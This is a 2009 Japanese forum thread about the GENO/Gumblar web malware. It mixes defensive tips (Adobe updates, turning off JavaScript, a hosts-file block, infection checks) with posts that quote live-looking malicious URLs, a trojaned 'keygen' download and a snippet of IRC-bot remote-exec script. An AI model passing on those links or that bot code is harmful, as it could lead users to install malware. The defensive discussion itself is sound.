GENOウイルススレ　★22

■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
　とりあえず最新版にしましょう。
　インストール後本体をアップデートしておく事
　adobe readerを開いて　ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

GENOウイルスチェッカー(アフィリエイトも充実)
tp://geno.2ch.tc/←　アフィリエイト（Amazon）　↓ソース

<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>

Jane使っている人は
ツール-設定-コマンドで
コマンド名　適当
実行するコマンドに tp://geno.2ch.tc/index.php?url=$TEXT$LINK
でjaneから検索でチェックできる

【関連スレ】

GENOウイルススレ　感染4台目
http://pc11.2ch.net/test/read.cgi/internet/1243050166/

【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/

乙女＆BL＠【公式感染】GENOｳｲﾙｽ注意喚起ｽﾚ2
http://schiphol.2ch.net/test/read.cgi/ggirl/1242719888/

【顧客相手に】GENOを語るスレ24【ｻｲﾊﾞｰｼﾞｪﾉｻｲﾄﾞ】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/

　　　　 ＿＿_
　　　／|∧_∧|
　　　||. (･ω･`|　次スレはここか
　　　||oと.　 Ｕ|
　　　||　|（__）Ｊ|
　　　||／彡￣ ｶﾞﾁｬ

重複

GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
ttp://pc11.2ch.net/test/read.cgi/sec/1245402584/

　　　　 ＿＿_
　　　／|∧_∧|
　　　||. (　　　)|　部屋をまちがった
　　　||oと.　 Ｕ|
　　　||　|（__）Ｊ|
　　　||／彡￣ ｻｻｯ

GENOウイルススレ　★21
http://pc11.2ch.net/test/read.cgi/sec/1243346768/

乙

>>5
そのスレはテンプレ間違いすぎだし
早漏だから却下

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
http://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認
　　http://www.btfree.info/file.php?action-get.html
　　Code by: 790e3cc3feabad9

重複

GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
ttp://pc11.2ch.net/test/read.cgi/sec/1245402584/

>>12
現在の最新版は9.1.2です
何の根拠で9.1.1指定か
その表記なら常にバージョン書き換えるぐらいしてください
9.1.0でGENOは対策済みです

何で本体からアップデートさせない

javaScriptのみで完全安全ではありません

重複

http://pc11.2ch.net/test/read.cgi/sec/1242582100/

スパムの大部分は中国関連、米研究者が集計
http://www.itmedia.co.jp/enterprise/articles/0906/22/news017.html

sega

今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ（米セキュリティ企業公表）

http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075

バスターはスゴイ！
すごい

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

GENOウイルスだと思ってブロックしてみる！
http://tinyurl.com/2b94y2

※中身はJR東日本のHPです

もういらなくね？

そらそうよ

アフィ中が

ヨドバシのPC購入者の半分がウィルスに感染
http://tsushima.2ch.net/test/read.cgi/news/1245689548/

ナにこれ

>>11の３はコード入れてダウンロードすると
avastのプロフェッショナルバージョンのkeygenのRARファイルと
表示されるけど無料のavastでチェックしたらマルウェアと診断された・・

Virustotalで解析しても今日現在だと半分以上が黒と診断してる

オフィシャル以外からのDLは危ないね

失敗

>19　よう〜
コード貼り付けるなよ
ノートンがぶろっくしてるじゃんボケ

http://u9.getuploader.com/orz.gamemaster/download/11/gv3.jpg
Download Password: geno?
MD5: 4720e402afe7e098465a0a3c666cbf70
Size: 330.5 KB
-------------------------------------------------------
こんなの踏んでしまったんだが。おいらのPCは逝っちゃいますか？

Firefox3+NoScript使用
adobe flashは最新版を使用(versionは何処で見るのかわからん)
PG2+Kerio422+Avira 9で壁を立てている・・のに。

>>30
http://www.gigabyte.co.jp内のフラッシュムービーが原因で
「ムービー内のスクリプトが原因で実行速度が遅くなっています」のエラーがでただけではないか
今ギガバイトサイトが落ちているけれど修復中か

Adobeサイト参照
http://www.adobe.com/jp/support/kb/ts/228/ts_228663_ja-jp.html

>>30
見てほしくないようなので見ないけど
心配ならOS入れなおせば良いよ

>>26
なんで無料で使えるアンチウィルスのkeygenを貼ってるんだろうな。
こんなあからさまに釣り臭いものを貼ったバカ、それをテンプレに入れたバカ、それを気づかずに貼るバカ、みんな消えてください。

プロフェッショナルは無料じゃないからに決まってるだろ

そこじゃなかったか
ごめん

Apacheに新たな脆弱性発見
http://slashdot.jp/security/article.pl?sid=09/06/23/0455215

Apacheて

世の中の何割かのサイトを一気に落とせる脆弱性ですね
ってかおまいも/.が情報元かよ

/.

重複しねええええええええええええええええええ

セキュ板にゴミ増やすな糞
http://pc11.2ch.net/test/read.cgi/sec/1245402584/

だまれ

ここまで俺の自演

自演ならしょうがない

情強のニュー速民ならウィルスに感染した事なんかないよな　　　　　　　　　　　　　　　　　　　.exe
http://tsushima.2ch.net/test/read.cgi/news/1245836922/l50

>>44　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　↑w
ないよ

Adobe Shockwaveに重大なセキュリティホール -- 数億人に影響
http://japan.zdnet.com/sp/feature/07zeroday/story/0,3800083088,20395621,00.htm

一応アップデートしたほうがいいかも

>>46
それ以前にインストールしてもインストール後の初回コンテンツ読み込みで、初期化中のまま止まるからどうしようもない。
AdobeはActiveXによる動的インストールを過信しすぎというか、安易に使って墓穴掘りすぎだと思うの
PDFリーダごときになぜActiveXを引っ張り出す。

Shockwaveはいらん

ウェブ経由のActiveX/VBScript/JavaScriptとリファラ転送はPFWで確実に拒否させているのでまったく気にならない。

ほう

ベンダーが対応してないころに過剰反応でクリーンインスコしたやつは負け組み？
結局実害なかったんでしょ

実害無かったって誰が言ったの？

こんなもん引っかかる時点で

ド素人が偉そうだな

>>49
XSS耐性が下がるのでリファラ転送は切らないほうが良い。

>>54
やべぇ、2chにプロ登場しちゃったよ

2chは自演のプロ集団

>>52
GENO

だからGENOウイルス

ttp://110.165.41.103:888/pdf/fk.pdf

>>56
ド素人でもド素人を批判できる
お前日本語もド素人だな

だれがド素人なん

おれ様

貴様ら何様のつもりだよ

王子様

逆さま

さま

まさ様

じーさま

GENOはしんだ

貴様

ヨン様

お子様

ランチ

かしこ

【社会】Ａ４のコピー用紙が突然Ｂ５に変形
http://gimpo.2ch.net/test/read.cgi/news7/1244987217/

ニュース [私のニュース]　“目指せ3000000人釣り！part67”

なにこの流れｗ

GENOってる

GENOGENO

げのげの

バスターだけど、
ニコ動大百科から横のカラムに並ぶ
お勧め動画に飛ぼうとするとブロックされるわ
なんかの記述がひっかかるんだろうね

>>82
>>18

マジレスするとニコ動スレかバスタースレで聞いたほうが早い
ここでバスター関連の質問しても釣り認定されるだけ

バスターもニコ動も使わないから違うかもしれんけど
ttp://bbs.nicovideo.jp/test/read.cgi/bugreport/1245475420/

もう質問する奴もそれに答える奴も
みんなまとめて逝ってよし

GENOの歌が歌えなくなりますもんね（笑）

バスターはスゴイ！
すごい

バスターバカにすんな

ＧＥＮＯって何て読むの？
ジェノ？ゲノ？

ＧＥＮＯさんに聞いてくださいな

GENOのサイトにはジェノって載ってる

だからGENOサイト

下脳だよ

じぇのじぇの

ジェノだけどゲノウイルスとよんでもいいよ

ショップ名はジェノ
ウイルス名はゲノ

これ豆な

げのげの

正式名称じゃなくて通称なんだから、どっちでもいいのでは？

初めて知った時、ゲオに見えてゲオのブクマ消した俺がいるお(・ω・)

GEOはゲームのゲオと別の会社で地図のジェオがあるんだね
やっぱり、どっちでもいい気がするお(AA略)

じぇのげの

ああなんか久しぶりにX68Kのジェノサイドやりたくなってきたｗｗ

【連載】GENOの歩き方 (1) 激安パソコンやPCパーツ、周辺機器を通販でラクラク入手 | パソコン | マイコミジャーナル
http://journal.mycom.co.jp/series/geno/001/index.html

GENOなら豊富な在庫をオンラインで自由に比較検討
「通販ショップGENO」は、デスクトップPC、液晶一体型PC、ノートパソコン、UMPC、Macintoshといったコンピューターをはじめとして、
PCパーツ、液晶モニタやプリンタ、NASなどの周辺機器、無線LANルータやハブなどのネットワーク機器にいたるまで、
非常に多彩なジャンルの商品を揃えている。商品は基本的に新品やアウトレット品が中心だが、
他社にはない良品中古のなどの商品も数多く販売されているのがユニークだ。
なお、各商品には商品名の頭に【新品】【良品中古】【リファビッシュ】などの記述がされているため、
例えば中古品には抵抗があるけれどリファビッシュならOKという場合もすぐにお目当ての商品が見つかるだろう。

リファビッシュってかっこいいよね

GENOさんｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━!!!!

自分はGENO再度からの新参だから
GENO社に対しては特別なんのアレもないけど
>>103のリンクに、素敵な記述があったので引用させてもらおう
＞賢い買い物において肝心なのは、商品の本質をキチンと見極められるかどうかなのだ。

利用者が各自、判断すればいいんじゃないの
勃発時からの住民の皆さんの意見は、また違うかもしれない

その後

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1931
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1932
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1933

http://pc11.2ch.net/test/read.cgi/pc/1246005400/

結局GENOウィルス被害はもう終わりか

結局さあ
このウイルスは何が危険なの？？
お前らが勝手に騒いでるだけじゃん

>>111
GENO店員乙

>>111
お前か危険じゃないと思えば危険じゃないんじゃね？
よかったじゃん

wikiwikiのエラーページにgenoウイルスってほんと？

何今日なんか伸びてんな
こわい

>>111
＾＾＾＾＾＾＾；；；；；

>>114
フラ板の某スレで、そんな書き込み見た
住民の人がカスペでスキャンして異常
なしだったみたいだから誤情報じゃない

>>117
いや、誤情報じゃないね
ttp://pc11.2ch.net/test/read.cgi/sec/1242606390/703
703 名前：61[sage] 投稿日：2009/06/27(土) 09:45:04
>>699
AVIRA9 7.01.04.144
　fk.pdf - HTML/Shellcode.Gen
Kaspersky 2009/06/27 8:38:00
　fk.pdf -

Kaspersky提出済み。


fk.pdfの中身みるともろだわ

>>114
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.wikiwiki.jp%2Ferror%2F403.html&hua=
※ 隠しスクリプトを発見しました。(1)
fk.pdf

wikiwikiって結構利用者多いんじゃね？
まーたスレが10くらい進むぞｗ

いわゆるGENOみたいに難読化されたjsでは無いね
もろ誘導じゃねーか。これなら対応しやすいんじゃないの

＞�Asqlsodbc.chmのファイルサイズの確認を確認する
＞　■Windows XP:
＞　　改ざんされていなければ
＞　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes


これ日本語のOSのみ50,727 bytesって表記しとけよ
他言語のOSだと、感染してなくてもsqlsodbc.chmの容量が違う

こっちは重複

↓本スレ
ttp://pc11.2ch.net/test/read.cgi/sec/1245402584/

GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。

ﾌｲﾀ

間違い探し

（オススメ度）（オススメ度）（オススメ度）
（オススメ度）（オススメ度）（オススメ度）
（オススメ度）（オススメ度）（オススメ度）
（オススメ度）（オススメ度）（オススメ度）
（オススメ度）（オススメ度）（オススメ度）
（オススメ度）（オススメ度）（オススメ度）

>>123
そっちは無断スレ立て
前スレ500ぐらいで立てて落ちてもう一回立てたな
落ちるまでほっとけ

あげあげなかんじで

wikiwikiから不正コード削除確認
hXXp://0x6EA52967:888/jp.jｓ
・・・とあと副産物↓
hXXp://1540341936:888/diｒ/dir.htｍ

うぜぇ

>>118
>>117です、スミマセン。訂正恐れ入ります
少なくともGENOではないのではと思ったのですが
GENOでしたか。自分が無知で浅はかでした
そのスレの方もカスペでスキャンしたわけでなく
自分の環境で問題なかったというだけでした
スレ名ぼかそうとFAKE入れて、かえって
住民の方に失礼になってしまいました
併せて お詫びいたします

作った人間はもう捕まったのかねえ

>>118
そのfk.PDFはGENO新種(亜種)みたい?

44 ：(*‘ω‘ *)オンライン：2009/07/06(月) 07:33:34 ID:VmXw78Zk0
Adobe Rader 最新版9.1.2にしてるのに、
そのwikiのPDFウイルス食らって、ウイルスのexe本体感染しかけた・・・

wiki見てたらいきなりコマンドプロンプトが開いて、
アンチウイルスソフトがウイルス本体(exe)検出して削除。
ググったらウイルスexe自体は去年既出のやつだったので助かったがあぶねぇ。

Adobe Reader 9.1.2に脆弱性があるってことだよね。

47 ：(*‘ω‘ *)オンライン：2009/07/06(月) 07:57:36 ID:VmXw78Zk0
>>46
いやAdobe Readerの環境設定のadobe scriptはoffにしてた。
それでも感染(exeのダウンロード開始）したんよ。
何がいいたかというと今度の脆弱性は
adobe reader9.1.2&adobe script offにしていても意味無い
新しいやつだねという話。

PDF ExploitはみんなGENOなの？
亜種亜種って何を根拠に言ってたんだか

ウイルスつうかpdfの中身みれば新種かどうかはわかるやつにはわかる。
そういうおまえさんこそ、何を根拠に言ってるの？

（去年あたりから）アドビ製品のセキュリティ−ホールのやばさは異常

とりあえず現状
ttp://www.virustotal.com/jp/analisis/247f523d4adf0eea2170ef14daaa38e5e3d6dc93acbc4d4e622c609be579b598-1246421031

iframeに埋め込むタイプだね
ttp://www-935.ibm.com/services/jp/index.wss/consultantpov/secpriv/b1332868

GENOの定義わからん

>>138
改竄サイトに置かれたjavascriptで攻撃サーバーに誘導しAdobe製品の脆弱性を突いて
ウィルスをダウンロードし感染させる攻撃のプロセスを持った一連のウイルス

通称　Gumblar/GENO

Adobeしねよ
糞製品ばっか作りやがって

Reader削除しちゃえばいい

ここでの質問はスレチかな

Reader以外のpdf閲覧ツールなら大丈夫な理由は、Readerの脆弱性を突いてるからで
他の閲覧ツールなら問題のpdf開いても大丈夫ってことなんだよね。

もしAっていう閲覧ツールが、Readerの脆弱性のある機能？と同じ機能を持ってたら
当然Aで閲覧するのも危険なんだよね

同じ機能にAdobeと同じ脆弱性があるかは分からない
実装が違えばない

>>143
ありがとう。納得した。

iframeも切っとけ

reader削除（flashは有）してOSはVISAでUAC有効、ブラウザはopera（要設定）かfirefox（アドオン、設定必須）で比較的安全か
IEは8入れたらえらい事になったから通常用途では二度と使わない
2chブラウザのためにIE7は残しておく

>>139
ご丁寧な解説ありがとうございます
検出名より感染プロセスで一括りに
されるということでしょうか
いずれにしろ大変 勉強になりました

>>147
検出名は内部組成や亜種の生成ルートの推定から行われるもので、検出名はワクチンベンダの一存、系譜の根拠にするものではない
推定される亜種・模倣の系譜でGENOって呼んでるから、感染プロセスで適当に一括りしてるわけではない・・・はず

それに、132のレスのID:VmXw78Zk0の言い分を見るに、今までのGENOをカスタムして作られてるからこれも亜種
つっても、感染経路を拡張し、偽装方法を変更し、発症症状を変更し、踏み台を入れ替え、感染経路を新造して、亜種の亜種の亜種って続いてきただろうから、オリジナルの痕跡は残っていない可能性も有るけどな

しかし9.1.2+adobe script offでもやっぱり穴があったのか
案の定の結果だが渦中の本家に亜種としてゼロデイやられるとか、Adobe舐められ過ぎワロス
俺はOpera使いだからこそ気楽にプラグイン切り替えられるが、こんな変態ブラウザは一握りだし・・・
もうどうしようもない所まで来てるなぁ・・・

>>148
Adobe以外の脆弱性もついてたみたいだからそっちかもしれないよ

ウイルスに詳しい方が多いと思うので、教えてください

サイトが感染というよりも…
レンタルサーバー屋自体が、ウイルス感染したみたいなんです
(かなり有名なとこです)

これはGENOウイルスなのでしょうか?

上手く説明できないので…
詳しいことは、そのレンタルサーバーのスレッドを見て頂けたらと思います

正直、とても不安です

VALUE DOMAINってどうよ？ part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/

>>150
はい同類です
wikiwikiはこれが原因だったようです

アンチウイルスが反応なしでもPCが不安定になったなど
心当たりがある場合はOSの入れなおし推奨
心配な場合も入れなおしどうぞ

>>148
やり口は似ていても、その中で GENOの系譜を継ぐものと継がざるもの
ルーツなり経緯なりで明確ではないにしろ一線を画すということでしょうか
大元をたどれば、どこに行き着くかということかもしれませんが…。
自分のような一般の人にとっては危険なことには変わりありませんので
>>134の言うとおり　＞わかるやつにはわかる でいいのかもしれませんね
可否スレの方たちが新種・亜種・別物と分析なさってくれてますし

>>130
今そのレス見ると、カスペがユーザー使用環境で対応してるか
確認の依頼だったかもしれないですね。重ね重ね失礼しました

>>149
＞Adobe以外の脆弱性
さっき、そのスレ見たら
＞既知の(パッチ済みの)脆弱性
と誰かが書き込んでました
参照URlは「Microsoft Video ActiveX コントロールの脆弱性」のページでした

1つはPDF等の脆弱性を突いたもの　GENO亜種
1つはActiveXの脆弱性を突いたもの　ゼロデイアタック
共通点はいずれも配布元が香港

前に狩りがどうの正義がどうののスレ
見たことあるけど、それもつながってるの？

IE×Firefox×Opera×Safari×Chrome 最終戦争7回戦
http://pc12.2ch.net/test/read.cgi/software/1246005705/119

>>151
ありがとうございます

自分のパソコンに関しては、とりあえずクリーンインストールをしようと思います

ただ今回、ログインページに仕掛けられてたみたいなので…

サイトのファイルを他へ移転できたとしても…
サーバーに預けてるドメインを、ログインしないと移管出来ないのがきついですね

おたくのスレにあったレスを頼りに情報たどっていくと
このページに行き着くけど、恐いから直リンや止めとくわ
ttps://www●value-domain.com/howto/?action=transfer（●は.）
一応view-source:で、おたくのスレの85-86が入ってないのは見た
ソース見れるなら自分で確認してほしい。自己責任で

>>152
パッチ済みじゃないよ
Microsoft ビデオの ActiveX コントロール脆弱性により、リモートでコードが実行される.
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx

対策方法はこちら
http://support.microsoft.com/kb/972890/

なるべくならIEを使わないほうが良いらしい

>>158
またVISTAは相手にされなかったのか・・・

>>158
誤読してました。ちゃんと未パッチの脆弱性
ってありましたね。お手数をおかけしました

>>159
ユーザ少ないし、セキュリティ強めだから手間掛けるまでも無いってか。
それにWindowsUpdateでパッチしにくい脆弱性が発見されていると仮定して、今その穴を使ったら出荷前の普及するだろう7で対策される公算が高いわけで。

今更だがfirefoxのnoscriptは信頼できないサイトと信頼できるサイトの制限設定が排他処理じゃないなのが問題だな
これだと、許可サイトは強制的に全てを許可されるからOSがXPだと少々怖い
operaの方が妥当かもしれない
信頼サイトにも個別に制限出来るようにすべき

本末転倒かも知れんが、NoScriptとAdblockの併用いいよ

NoScript と YesScript を併用すりゃいいんじゃね？

YesScriptは、URLをブラックリスト登録して初めてJavaスクリプトが無効にできる
サイトがころころ変ってしまうような場合は無力だよね

Adblockは、直接埋め込まれたjavascriptは無効にできないよね
ブロックするのが外部のjsだけなら簡単なんだけどね

＞直接埋め込まれたjavascriptは無効にできない
あああああああああああああああああああああああああああああああああ

じゃあどうすりゃいいのよ

誰か対策まとめてくれ

【韓国】青瓦台、国会、国防部、ネイバーなど25サイトにDDoS攻撃[07/08]
http://takeshima.2ch.net/test/read.cgi/news4plus/1247014272/

ax.xrea.comが感染か
>>168
OSをvistaに変更

>>168
LANケーブル引っこ抜く

RequestPolicyは？

あれ、凄い使い難い

>>170
XPのパソコンをVistaにアップグレードするのも意外と危険なんだよね
うまくインストできてもXPで当たり前のようにできていたことができなくなるし

ha?

>>172
Operaに似たような機能が標準で付いているけれど
動画サイトで使うの大変だよ

xreaは今朝アクセスしたら確かにノートン先生が大怒りだったな　
activeX系だからvistaは対象外だが

おいおい、Adobe関連は全て最新にしてたのに感染したっぽい
しかもブラウザどころか最早タスクマネージャすら起動しない始末
どうしろと

使用OS、ブラウザ、javascriptの有無を
まぁ、別件でxreaのようなタイプ（activex経由）なら感染は有り得る

>>178
ActiveXからやられたんだろ

Adobeだけ最新なら別のものじゃないの

>>153

そもそも何に感染したかわかってないようだし
症状的にも今回のもの(新種ではなく旧来のキーロガー)と違う感じなので
別の何かではないかと

タスク自体重いのならマザーボードがお逝きになる寸前かもね

ディスプレイで虫みたいなのがグルグル動きまくってて何か感染したのかとおもったら
本物の虫だった

これが北朝鮮の選択か…米韓への田代砲攻撃、止まる気配なし
http://tsushima.2ch.net/test/read.cgi/news/1247153428/

xreaのアクセス解析にアクセスしましたが、私のパソコンに感染はしていないみたいです
アクセス解析は大丈夫なんでしょうか…。

【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/

>>188
ここ開いただけでavast!が反応する..ｶﾞｸｶﾞｸｸﾞﾙｸﾞﾙ

もう怖いから夜のエロサイト以外見ないようにする

いや、そのエロサイトが危ないんだがｗｗｗ

ファイル共有ソフト「Share」が何者かに攻撃を受けフリーズしまくる 2PB
http://tsushima.2ch.net/test/read.cgi/news/1247162852/

情報もれてもいいシュミ用のパソコン用意すればいいんだよ

廃れた

【share】 sharebot丸の内OCN監視ｽﾚ 【洒落】
http://hideyoshi.2ch.net/test/read.cgi/download/1247399721/

決闘勝利おめｗｗｗ

誤爆。。

http://pc11.2ch.net/test/read.cgi/sec/1243346768/686
>javascript単体でどうこうするウィルスは確かにほとんど居ないが、脆弱性自体はあるし、あった。
>ウィルスではないが、XSSなどはjavascript経由で発症する物がほとんどであるし、切る事で安全性は確実に高まります。

実例
↓
http://slashdot.jp/security/09/07/15/0449234.shtml
Firefox 3.5のJavaScriptエンジンに未対策の脆弱性が発見される。

最近のJavaScript高速化戦争の弊害だな、こりゃ。
素直に実装するだけならそれなりに枯れて安全になってきていた筈だからな。

TraceMonkeyによるJSの高速化も3.5の売りだから
枯れてないのは仕方がない。
3.0(笑)ではChromeのV8に相手すらしてもらえない。

結局インフルエンザと同じぐらいに収まったな
作ったﾔｼの全面負けでFA？

genoウイルススレがいくつも立ったのだから作ったやつの勝ちだろ

アフィは儲かったんだろうか

・・・・・あれ？

買わなきゃ入らないamazonでは厳しい
情弱が来るジャンルでもあんまないし
やはりゲームアニメのがいいわ

収まっていないようでして・・

パソコンは問題ないようですが
ＨＰが何度も改竄されます。
パスワードを変えても、すぐ見破られてしまいます。

どしたらいいんでしょう

そんなやばすぎるHPは一旦閉鎖しろ

まだあんのか、このすれｗ

>>204
VALUE DOMAINってどうよ？ part35
ttp://pc11.2ch.net/test/read.cgi/hosting/1247663722/

【アクセス解析】AccessAnalyzer.com Part6【XREA】
ttp://pc11.2ch.net/test/read.cgi/hp/1247279199/

何で今になって

>>204
問題ないかどうかは本当に確認した？OS入れなおした？
それ以外なら>>207関連かな

>>203
アニオタゲーオタって無知な奴多いのか

>>204
感染したままでパス変更してるか、感染したPCで更新作業してるかだろ。
HPは全ファイル削除→PCリカバリ→ftpパス変更→HPにファイル戻し

>>210
ガキがくるからな

アバストが反応してJS:Redirector-H4 [Trj]を検出しましたと出た。
ブロックしてくれたから良かったけど。

それは報告しなくていいです

私の戦闘力は530000です

私の愛馬は凶暴です

>>215
とっとと本気出せよオカマ野郎

アンラボ■■■【アンラボ】V3ウイルスブロック Part6■■■
http://pc11.2ch.net/test/read.cgi/sec/1207926691/

これきくんだろうか

さぁ

ウィルスブロック2005を更新するのわすれてて2005のままの私が通ります。

【GENO】 またFlash Playerの脆弱性を突いたウイルス出現
http://tsushima.2ch.net/test/read.cgi/news/1248360445/

vistaの一人勝ち
まぁ、それくらいのメリットがないと救いようのない地雷OSだからね

マジ糞すぎる
Adobe潰せ

Silverlight, XPS の MS の時代を望んでいるんですか？

djvuもたまには思い出してあげてくださいね

silverlightは某動画サイト（現在、閉鎖）にも採用されていたから意外と面白いかもしれんが
開発環境が厳しいらしいな

GenoウイルスNineballとは関係ないんで、スレ違いなんだが、
最近、Firefoxが謎のIPと　暗号化通信　している。

209.134.161.75
なんだが、Whoisにかけると　Internet Security Systems　とかいう知らないドメインらしい。
気持ち悪すぎるんだが、だれか分かる人いない？
ググルと、同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。

こういうことが質問できるスレでも構わないからアドバイスが欲しいっす。

firefoxじゃなくセキュリティソフトの鯖の可能性があるね

>>228
レスありがとう。
でも、そのセキュリティーソフト(Kaspersky)で>>227をモニターしているんだ。
それで通信しているアプリがFirefoxだと表示されちゃう。

通信先のサーバーもKasperskyのものではないみたいだし、
googleのセーフブラウジングでも、Firefoxの更新を確認するためにモジラのサイトと通信しているのでもない
みたいで気持ちわるいっす。

じゃあ、アドオン、2chブラウザ、無線LAN、メーカー製PCなら常駐アプリがバックグラウンドでアドウェアのような事をやってるとか
うちもfirefox3.0.12(OSはvista）だがそういう挙動は一切ないな

>>230
レスありがとう。
Firefox3.0.12で問題ないって情報だけでも助かる。
今は3.51を使っているけど、そっちの環境も残してあるので確認してみる。

一番ヤバイのはFirefoxの通信と偽ってアドウェアが通信していることだよね。

ところで、
>そういう挙動は一切ないな
はどうすれば確認できる？

firefoxスレで訊いたら？

>>227
>同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。
考えにくいというのは何で？
正引き逆引き一致でwebapp.iss.netなんだけどあやしいの？

アドオン何いれてるの？
アドオンなしでもその通信発生するの？

P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら
素直にOS入れなおしたほうが安心だと思うよ

>>233
わざわざ試してくれてありがとう。

自分でやったら一致しなかったんだ。　おかしいよね。
どこのwhois使っても同じ結果になるはずだけど、　良かったら　どこで検索したか教えてくれない？

>素直にOS入れなおしたほうが安心だと思うよ
自分もまったくその通りだと思う。
ただ、面倒だから自分の勘違いだったり、まっとうな理由が見つかればいいなぁと思っている。

>P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら
一般的にヤバイとされるサイトには行っていないし、プラグインも全オフ状態。
FirefoxアドオンのNoScriptが"ざる状態"らしいと知った昨日からはJavaScriptも切っている。

ただ、>>230さんの言うように、3.0.12の時にはこんな通信していなかったはずだと自分も思っていた。
思い当たるきっかけといえば　3.50以降にアップしてから　ってことになっちゃう。
